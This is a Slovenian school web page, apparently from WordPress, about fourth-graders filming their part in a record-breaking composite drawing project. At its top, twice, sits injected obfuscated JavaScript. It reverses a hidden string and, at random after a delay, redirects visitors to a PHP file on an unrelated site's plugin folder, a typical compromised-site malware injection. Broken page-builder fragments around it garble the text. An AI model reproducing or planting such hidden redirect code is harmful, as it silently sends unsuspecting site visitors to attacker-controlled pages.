Select Page
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_width=”off” width_unit=”off” custom_width_px=”1080px” custom_width_percent=”80%” make_equal=”off” use_custom_gutter=”off” fullwidth=”off” specialty=”off” admin_label=”section” disabled=”off”]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_width=”off” width_unit=”off” custom_width_px=”1080px” custom_width_percent=”80%” use_custom_gutter=”off” gutter_width=”3″ padding_mobile=”off” allow_player_pause=”off” parallax=”off” parallax_method=”on” make_equal=”off” column_padding_mobile=”on” parallax_1=”off” parallax_method_1=”on” parallax_2=”off” parallax_method_2=”on” parallax_3=”off” parallax_method_3=”on” parallax_4=”off” parallax_method_4=”on” admin_label=”row” disabled=”off”]

Nove tehnologije v šoli, ki podira Guinessov rekord


Na OŠ bratov Polančičev Maribor učimo 4. razrede, kako uporabljati mobilne telefone in spletne tehnologije za ustvarjanje kakovostnih spletnih objav.

Šola se je priključila projektu Skupaj smo večji in učenci skupaj z vrstniki in vsemi drugimi Slovenci ustvarjajo največjo sestavljeno risbo na svetu.

Ker so na šoli spoznali, da je prehod med 3. in 6. razredom “ozko grlo” za razvoj tehničnih in tehnoloških spretnosti otrok, hkrati pa zelo pomembno obdobje za njihovo samostojno in skupinsko delo, smo skupaj razvili aktivnosti, ki bodo to vrzel vsaj za nekaj ur zapolnile.

tografija igrišče” width=”300″ height=”200″>

Hiter pregled aktivnosti (za katerimi stoji precej osebnega in e-dogovarjanja med ravnateljico, učiteljico likovne umetnosti, razredničarkama 4. razredov in mentorjema Spreten.si):

  • učenci razmišljajo, kašen rekord bi oni postavili (vsak sam ali v skupini)
  • učenci se pozanimajo, ali takšen rekord že obstaja in kateri so podobni rekordi (v Guinessovi knjigi)
  • učenci se preko spleta (VoIP) pogovarjajo z vodjo projekta Skupaj smo večji
  • učenci sestavijo scenarije za svoj film (v manjših skupinah in za skupni film)
  • učenci s svojimi telefoni snemajo risanje risb za največjo sestavljeno risbo na svetu, medtem podajajo izjave glede na scenarij
  • učenci posnetke primerno označijo, naložijo v oblak in delijo z mentorji
  • učenci posnetke “prečistijo” (označijo dele, ki bi jih uporabili)
  • učenci sodelujejo pri snemanju profesionalne ekipe, ki iz zraka posname njih in njihovo sestavljeno risbo
  • učenci se učijo iz posnetkov sestavljati film (“montirati”)

Več informacij, posnetkov in fotografij je na Facebook strani OŠ bratov Polančičev. Fotografijo na tej strani je med pripravami za zračne posnetke za končni izdelek naredil fotograf Marko Pigac (MP Produkcija).